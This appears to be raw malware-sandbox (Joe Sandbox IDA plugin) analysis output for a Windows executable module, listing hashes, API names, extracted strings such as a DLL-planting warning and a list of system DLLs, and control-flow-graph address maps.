      • Opcode ID: d07f51d72cd75e867552774118a6c040e604500fb8ad303e6384e03f62dbec60
      • Instruction ID: ca305e3bc0f6f685f522badf324c09ca02b2be86ae41e66f85b39b54009dc17b
      • Opcode Fuzzy Hash: d07f51d72cd75e867552774118a6c040e604500fb8ad303e6384e03f62dbec60
      • Instruction Fuzzy Hash: A8E29376A1C6D2D2EB66BB25E1403AEE761FB81781F844132DB9D036A5CFBCE454C720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: CMT
      • API String ID: 3668304517-2756464174
      • Opcode ID: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
      • Instruction ID: 94384cba414d68da7b5cb88ce90eaa28d9dc4f539ee3d3c4f60b9bdd76677d84
      • Opcode Fuzzy Hash: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
      • Instruction Fuzzy Hash: E9E2012AB1C692C6EB1AFB25D5502FDA7A1FF46385F840032DA5E07696DFBCE055C320

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 3650 7ff741ea40bc-7ff741ea40f3 3651 7ff741ea41d2-7ff741ea41df FindNextFileW 3650->3651 3652 7ff741ea40f9-7ff741ea4101 3650->3652 3655 7ff741ea41e1-7ff741ea41f1 GetLastError 3651->3655 3656 7ff741ea41f3-7ff741ea41f6 3651->3656 3653 7ff741ea4103 3652->3653 3654 7ff741ea4106-7ff741ea4118 FindFirstFileW 3652->3654 3653->3654 3654->3656 3657 7ff741ea411e-7ff741ea4146 call 7ff741ea6a0c 3654->3657 3658 7ff741ea41ca-7ff741ea41cd 3655->3658 3659 7ff741ea4211-7ff741ea4253 call 7ff741ec797c call 7ff741e9129c call 7ff741ea8090 3656->3659 3660 7ff741ea41f8-7ff741ea4200 3656->3660 3672 7ff741ea4148-7ff741ea4164 FindFirstFileW 3657->3672 3673 7ff741ea4167-7ff741ea4170 3657->3673 3661 7ff741ea42eb-7ff741ea430e call 7ff741ec2320 3658->3661 3686 7ff741ea4255-7ff741ea426c 3659->3686 3687 7ff741ea428c-7ff741ea42e6 call 7ff741eaf168 * 3 3659->3687 3663 7ff741ea4202 3660->3663 3664 7ff741ea4205-7ff741ea420c call 7ff741e920b0 3660->3664 3663->3664 3664->3659 3672->3673 3675 7ff741ea4172-7ff741ea4189 3673->3675 3676 7ff741ea41a9-7ff741ea41ad 3673->3676 3679 7ff741ea41a4 call 7ff741ec220c 3675->3679 3680 7ff741ea418b-7ff741ea419e 3675->3680 3676->3656 3678 7ff741ea41af-7ff741ea41be GetLastError 3676->3678 3683 7ff741ea41c0-7ff741ea41c6 3678->3683 3684 7ff741ea41c8 3678->3684 3679->3676 3680->3679 3685 7ff741ea4315-7ff741ea431b call 7ff741ec7904 3680->3685 3683->3658 3683->3684 3684->3658 3689 7ff741ea4287 call 7ff741ec220c 3686->3689 3690 7ff741ea426e-7ff741ea4281 3686->3690 3687->3661 3689->3687 3690->3689 3693 7ff741ea430f-7ff741ea4314 call 7ff741ec7904 3690->3693 3693->3685
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
      • String ID:
      • API String ID: 474548282-0
      • Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
      • Instruction ID: 9f36bcaae97a00490af19a8e0d31f3ec138676e66a085bfa2bda4b5768cc02ff
      • Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
      • Instruction Fuzzy Hash: CC61D666A0C652C1EB11BB25E84026DA361FB95BE5F944331EABD03AD9DFBCE444C710

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 3761 7ff741e95e24-7ff741e96129 call 7ff741ea833c call 7ff741ea85f0 3767 7ff741e9612e-7ff741e96132 3761->3767 3768 7ff741e96141-7ff741e96171 call 7ff741ea83d8 call 7ff741ea8570 call 7ff741ea8528 3767->3768 3769 7ff741e96134-7ff741e9613c call 7ff741e96fcc 3767->3769 3787 7ff741e96973-7ff741e96976 call 7ff741e9466c 3768->3787 3788 7ff741e96177-7ff741e96179 3768->3788 3774 7ff741e9697b 3769->3774 3776 7ff741e9697e-7ff741e96985 3774->3776 3778 7ff741e969b4-7ff741e969e3 call 7ff741ec2320 3776->3778 3779 7ff741e96987-7ff741e96998 3776->3779 3781 7ff741e969af call 7ff741ec220c 3779->3781 3782 7ff741e9699a-7ff741e969ad 3779->3782 3781->3778 3782->3781 3785 7ff741e969e4-7ff741e969e9 call 7ff741ec7904 3782->3785 3796 7ff741e969ea-7ff741e969ef call 7ff741ec7904 3785->3796 3787->3774 3788->3787 3791 7ff741e9617f-7ff741e96189 3788->3791 3791->3787 3793 7ff741e9618f-7ff741e96192 3791->3793 3793->3787 3795 7ff741e96198-7ff741e961aa call 7ff741ea85f0 3793->3795 3795->3769 3801 7ff741e961ac-7ff741e961fd call 7ff741ea84f8 call 7ff741ea8528 * 2 3795->3801 3802 7ff741e969f0-7ff741e969f7 call 7ff741ec7904 3796->3802 3811 7ff741e9623f-7ff741e96249 3801->3811 3812 7ff741e961ff-7ff741e96222 call 7ff741e9466c call 7ff741e9ba0c 3801->3812 3814 7ff741e96266-7ff741e96270 3811->3814 3815 7ff741e9624b-7ff741e96260 call 7ff741ea8528 3811->3815 3812->3811 3829 7ff741e96224-7ff741e9622e call 7ff741e9433c 3812->3829 3817 7ff741e96272-7ff741e9627b call 7ff741ea8528 3814->3817 3818 7ff741e9627e-7ff741e96296 call 7ff741e9334c 3814->3818 3815->3787 3815->3814 3817->3818 3827 7ff741e962b3 3818->3827 3828 7ff741e96298-7ff741e9629b 3818->3828 3831 7ff741e962b6-7ff741e962c8 3827->3831 3828->3827 3830 7ff741e9629d-7ff741e962b1 3828->3830 3829->3811 3830->3827 3830->3831 3833 7ff741e968b7-7ff741e96929 call 7ff741ea4d04 call 7ff741ea8528 3831->3833 3834 7ff741e962ce-7ff741e962d1 3831->3834 3853 7ff741e96936 3833->3853 3854 7ff741e9692b-7ff741e96934 call 7ff741ea8528 3833->3854 3836 7ff741e96481-7ff741e964f4 call 7ff741ea4c74 call 7ff741ea8528 * 2 3834->3836 3837 7ff741e962d7-7ff741e962da 3834->3837 3867 7ff741e964f6-7ff741e96500 3836->3867 3868 7ff741e96507-7ff741e96533 call 7ff741ea8528 3836->3868 3837->3836 3840 7ff741e962e0-7ff741e962e3 3837->3840 3841 7ff741e962e5-7ff741e962e8 3840->3841 3842 7ff741e9632e-7ff741e96353 call 7ff741ea8528 3840->3842 3845 7ff741e9696d-7ff741e96971 3841->3845 3846 7ff741e962ee-7ff741e96329 call 7ff741ea8528 3841->3846 3857 7ff741e96355-7ff741e9638f call 7ff741e94228 call 7ff741e93c84 call 7ff741e9701c call 7ff741e91fa0 3842->3857 3858 7ff741e9639e-7ff741e963c5 call 7ff741ea8528 call 7ff741ea8384 3842->3858 3845->3776 3846->3845 3860 7ff741e96939-7ff741e96946 3853->3860 3854->3860 3904 7ff741e96390-7ff741e96399 call 7ff741e91fa0 3857->3904 3880 7ff741e96402-7ff741e9641f call 7ff741ea8444 3858->3880 3881 7ff741e963c7-7ff741e96400 call 7ff741e94228 call 7ff741e93c84 call 7ff741e9701c call 7ff741e91fa0 3858->3881 3865 7ff741e96948-7ff741e9694a 3860->3865 3866 7ff741e9694c 3860->3866 3865->3866 3871 7ff741e9694f-7ff741e96959 3865->3871 3866->3871 3867->3868 3882 7ff741e96535-7ff741e96544 call 7ff741ea83d8 call 7ff741eaf134 3868->3882 3883 7ff741e96549-7ff741e96557 3868->3883 3871->3845 3875 7ff741e9695b-7ff741e96968 call 7ff741e94840 3871->3875 3875->3845 3899 7ff741e96421-7ff741e9646f call 7ff741ea8444 * 2 call 7ff741eac800 call 7ff741ec4a70 3880->3899 3900 7ff741e96475-7ff741e9647c 3880->3900 3881->3904 3882->3883 3889 7ff741e96572-7ff741e96595 call 7ff741ea8528 3883->3889 3890 7ff741e96559-7ff741e9656c call 7ff741ea83d8 3883->3890 3905 7ff741e965a0-7ff741e965b0 3889->3905 3906 7ff741e96597-7ff741e9659e 3889->3906 3890->3889 3899->3900 3900->3845 3904->3858 3910 7ff741e965b3-7ff741e965eb call 7ff741ea8528 * 2 3905->3910 3906->3910 3925 7ff741e965f6-7ff741e965fa 3910->3925 3926 7ff741e965ed-7ff741e965f4 3910->3926 3928 7ff741e96603-7ff741e96632 3925->3928 3930 7ff741e965fc 3925->3930 3926->3928 3931 7ff741e9663f 3928->3931 3932 7ff741e96634-7ff741e96638 3928->3932 3930->3928 3934 7ff741e96641-7ff741e96656 3931->3934 3932->3931 3933 7ff741e9663a-7ff741e9663d 3932->3933 3933->3934 3935 7ff741e96658-7ff741e9665b 3934->3935 3936 7ff741e966ca 3934->3936 3935->3936 3937 7ff741e9665d-7ff741e96683 3935->3937 3938 7ff741e966d2-7ff741e96731 call 7ff741e93d00 call 7ff741ea8444 call 7ff741eb0d54 3936->3938 3937->3938 3939 7ff741e96685-7ff741e966a9 3937->3939 3949 7ff741e96733-7ff741e96740 call 7ff741e94840 3938->3949 3950 7ff741e96745-7ff741e96749 3938->3950 3941 7ff741e966b2-7ff741e966bf 3939->3941 3942 7ff741e966ab 3939->3942 3941->3938 3944 7ff741e966c1-7ff741e966c8 3941->3944 3942->3941 3944->3938 3949->3950 3952 7ff741e9675b-7ff741e96772 call 7ff741ec797c 3950->3952 3953 7ff741e9674b-7ff741e96756 call 7ff741e9473c 3950->3953 3959 7ff741e96774 3952->3959 3960 7ff741e96777-7ff741e9677e 3952->3960 3958 7ff741e96859-7ff741e96860 3953->3958 3961 7ff741e96862-7ff741e96872 call 7ff741e9433c 3958->3961 3962 7ff741e96873-7ff741e9687b 3958->3962 3959->3960 3963 7ff741e96780-7ff741e96783 3960->3963 3964 7ff741e967a3-7ff741e967ba call 7ff741ec797c 3960->3964 3961->3962 3962->3845 3967 7ff741e96881-7ff741e96892 3962->3967 3968 7ff741e96785 3963->3968 3969 7ff741e9679c 3963->3969 3976 7ff741e967bf-7ff741e967c6 3964->3976 3977 7ff741e967bc 3964->3977 3972 7ff741e96894-7ff741e968a7 3967->3972 3973 7ff741e968ad-7ff741e968b2 call 7ff741ec220c 3967->3973 3974 7ff741e96788-7ff741e96791 3968->3974 3969->3964 3972->3802 3972->3973 3973->3845 3974->3964 3975 7ff741e96793-7ff741e9679a 3974->3975 3975->3969 3975->3974 3976->3958 3980 7ff741e967cc-7ff741e967cf 3976->3980 3977->3976 3981 7ff741e967d1 3980->3981 3982 7ff741e967e8-7ff741e967f0 3980->3982 3983 7ff741e967d4-7ff741e967dd 3981->3983 3982->3958 3984 7ff741e967f2-7ff741e96826 call 7ff741ea8360 call 7ff741ea8598 call 7ff741ea8528 3982->3984 3983->3958 3985 7ff741e967df-7ff741e967e6 3983->3985 3984->3958 3992 7ff741e96828-7ff741e96839 3984->3992 3985->3982 3985->3983 3993 7ff741e96854 call 7ff741ec220c 3992->3993 3994 7ff741e9683b-7ff741e9684e 3992->3994 3993->3958 3994->3796 3994->3993
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID: CMT
      • API String ID: 0-2756464174
      • Opcode ID: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
      • Instruction ID: e2d8f8b65e9634849225ddc5c7632f7e7c25b72873e2acb13e36462b1a994fab
      • Opcode Fuzzy Hash: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
      • Instruction Fuzzy Hash: C042FF2AB1C692D6EB1AFB74C1502FDA3A0FB06385F840136CB5E17696DFB8E519C310
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CreateInstance
      • String ID:
      • API String ID: 542301482-0
      • Opcode ID: 63cc97eea9404dc537e59db23731624e9de1278f625d6ab0d82bdfb106874faf
      • Instruction ID: b263421cf3b48b7bb37300a9118fdb7a268a44d826c3dc026e4e4fc8aa86ec7c
      • Opcode Fuzzy Hash: 63cc97eea9404dc537e59db23731624e9de1278f625d6ab0d82bdfb106874faf
      • Instruction Fuzzy Hash: B251037AA48A26C1EB11FF2AD88486CB372FB44F85B844436CE5D43768CF79D596C360
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
      • Instruction ID: 8b4030e326d63a46659ef2fdfaf73182de4062af347b62bf4ab230114f0e0888
      • Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
      • Instruction Fuzzy Hash: 37E1F22AA0C292CAEB66FF28E4442BDB790FB44749F884235DB8E57685DE7CE541C314
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
      • Instruction ID: a7194ae992b70f13ff98750d6b02126a1d360afd3cddb3603f44dea75f915a55
      • Opcode Fuzzy Hash: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
      • Instruction Fuzzy Hash: 76B110A6B08AE992DF1AFA62D6096F9A391B704FC5F848132CE0D07744DFBCE155C300
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Create$CriticalEventInitializeSectionSemaphore
      • String ID:
      • API String ID: 3340455307-0
      • Opcode ID: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
      • Instruction ID: 0f631b775b644d43a8b74ba0d753b670e3304276d0c7fc1b8d605121912ae580
      • Opcode Fuzzy Hash: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
      • Instruction Fuzzy Hash: 1E413A26B19666C6FB65FF11E95076AA242FBC47C8F884030DE0D07B95DEBCE442C314

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 7ff741eadfd0-7ff741eae024 call 7ff741ec2450 GetModuleHandleW 3 7ff741eae026-7ff741eae039 GetProcAddress 0->3 4 7ff741eae07b-7ff741eae3a5 0->4 7 7ff741eae053-7ff741eae066 GetProcAddress 3->7 8 7ff741eae03b-7ff741eae04a 3->8 5 7ff741eae503-7ff741eae521 call 7ff741ea6454 call 7ff741ea7df4 4->5 6 7ff741eae3ab-7ff741eae3b4 call 7ff741ecb788 4->6 20 7ff741eae525-7ff741eae52f call 7ff741ea51a4 5->20 6->5 14 7ff741eae3ba-7ff741eae3fd call 7ff741ea6454 CreateFileW 6->14 7->4 11 7ff741eae068-7ff741eae078 7->11 8->7 11->4 22 7ff741eae4f0-7ff741eae4fe CloseHandle call 7ff741e91fa0 14->22 23 7ff741eae403-7ff741eae416 SetFilePointer 14->23 27 7ff741eae531-7ff741eae53c call 7ff741eadd88 20->27 28 7ff741eae564-7ff741eae5ac call 7ff741ec797c call 7ff741e9129c call 7ff741ea8090 call 7ff741e91fa0 call 7ff741ea32bc 20->28 22->5 23->22 25 7ff741eae41c-7ff741eae43e ReadFile 23->25 25->22 29 7ff741eae444-7ff741eae452 25->29 27->28 39 7ff741eae53e-7ff741eae562 CompareStringW 27->39 67 7ff741eae5b1-7ff741eae5b4 28->67 32 7ff741eae800-7ff741eae807 call 7ff741ec2624 29->32 33 7ff741eae458-7ff741eae4ac call 7ff741ec797c call 7ff741e9129c 29->33 50 7ff741eae4c3-7ff741eae4d9 call 7ff741ead0a0 33->50 39->28 42 7ff741eae5bd-7ff741eae5c6 39->42 42->20 45 7ff741eae5cc 42->45 48 7ff741eae5d1-7ff741eae5d4 45->48 52 7ff741eae63f-7ff741eae642 48->52 53 7ff741eae5d6-7ff741eae5d9 48->53 60 7ff741eae4ae-7ff741eae4be call 7ff741eadd88 50->60 61 7ff741eae4db-7ff741eae4eb call 7ff741e91fa0 * 2 50->61 56 7ff741eae7c2-7ff741eae7ff call 7ff741e91fa0 * 2 call 7ff741ec2320 52->56 57 7ff741eae648-7ff741eae65b call 7ff741ea7eb0 call 7ff741ea51a4 52->57 58 7ff741eae5dd-7ff741eae62d call 7ff741ec797c call 7ff741e9129c call 7ff741ea8090 call 7ff741e91fa0 call 7ff741ea32bc 53->58 82 7ff741eae661-7ff741eae701 call 7ff741eadd88 * 2 call 7ff741eaaae0 call 7ff741eada98 call 7ff741eaaae0 call 7ff741eadc2c call 7ff741eb87ac call 7ff741e919e0 57->82 83 7ff741eae706-7ff741eae753 call 7ff741eada98 AllocConsole 57->83 107 7ff741eae62f-7ff741eae638 58->107 108 7ff741eae63c 58->108 60->50 61->22 72 7ff741eae5b6 67->72 73 7ff741eae5ce 67->73 72->42 73->48 99 7ff741eae7b4-7ff741eae7bb call 7ff741e919e0 ExitProcess 82->99 94 7ff741eae7b0 83->94 95 7ff741eae755-7ff741eae7aa GetCurrentProcessId AttachConsole call 7ff741eae868 call 7ff741eae858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->99 95->94 107->58 112 7ff741eae63a 107->112 108->52 112->52
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
      • API String ID: 1496594111-2013832382
      • Opcode ID: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
      • Instruction ID: f34a80660df58e0fca79d6dd977ebe96748ed834bf1a7c698630b740ee43116a
      • Opcode Fuzzy Hash: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
      • Instruction Fuzzy Hash: 46322D39A0DBA2D5EB12BF60E8402E9B3A4FF44355F840236DA5D067A5EFBCD245C360
      APIs
        • Part of subcall function 00007FF741EA8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741EA8F8D
      • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF741EA9F75
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EAA42F
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EAA435
        • Part of subcall function 00007FF741EB0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF741EB0B44), ref: 00007FF741EB0BE9
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
      • API String ID: 3629253777-3268106645
      • Opcode ID: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
      • Instruction ID: 6661f38335e3671faa7876eb9639ce87d5a7e9609a95bebc2fce03619580725d
      • Opcode Fuzzy Hash: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
      • Instruction Fuzzy Hash: 3162BE2AA1C7A2D5EB12FB64D8442BDA3A1FB807C5FC08132DA5D47695EFBCE544C360

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 1909 7ff741ec1900-7ff741ec1989 call 7ff741ec1558 1912 7ff741ec19b4-7ff741ec19d1 1909->1912 1913 7ff741ec198b-7ff741ec19af call 7ff741ec1868 RaiseException 1909->1913 1915 7ff741ec19e6-7ff741ec19ea 1912->1915 1916 7ff741ec19d3-7ff741ec19e4 1912->1916 1919 7ff741ec1bb8-7ff741ec1bd5 1913->1919 1918 7ff741ec19ed-7ff741ec19f9 1915->1918 1916->1918 1920 7ff741ec1a1a-7ff741ec1a1d 1918->1920 1921 7ff741ec19fb-7ff741ec1a0d 1918->1921 1922 7ff741ec1ac4-7ff741ec1acb 1920->1922 1923 7ff741ec1a23-7ff741ec1a26 1920->1923 1933 7ff741ec1a13 1921->1933 1934 7ff741ec1b89-7ff741ec1b93 1921->1934 1925 7ff741ec1adf-7ff741ec1ae2 1922->1925 1926 7ff741ec1acd-7ff741ec1adc 1922->1926 1927 7ff741ec1a28-7ff741ec1a3b 1923->1927 1928 7ff741ec1a3d-7ff741ec1a52 LoadLibraryExA 1923->1928 1929 7ff741ec1b85 1925->1929 1930 7ff741ec1ae8-7ff741ec1aec 1925->1930 1926->1925 1927->1928 1932 7ff741ec1aa9-7ff741ec1ab2 1927->1932 1931 7ff741ec1a54-7ff741ec1a67 GetLastError 1928->1931 1928->1932 1929->1934 1937 7ff741ec1aee-7ff741ec1af2 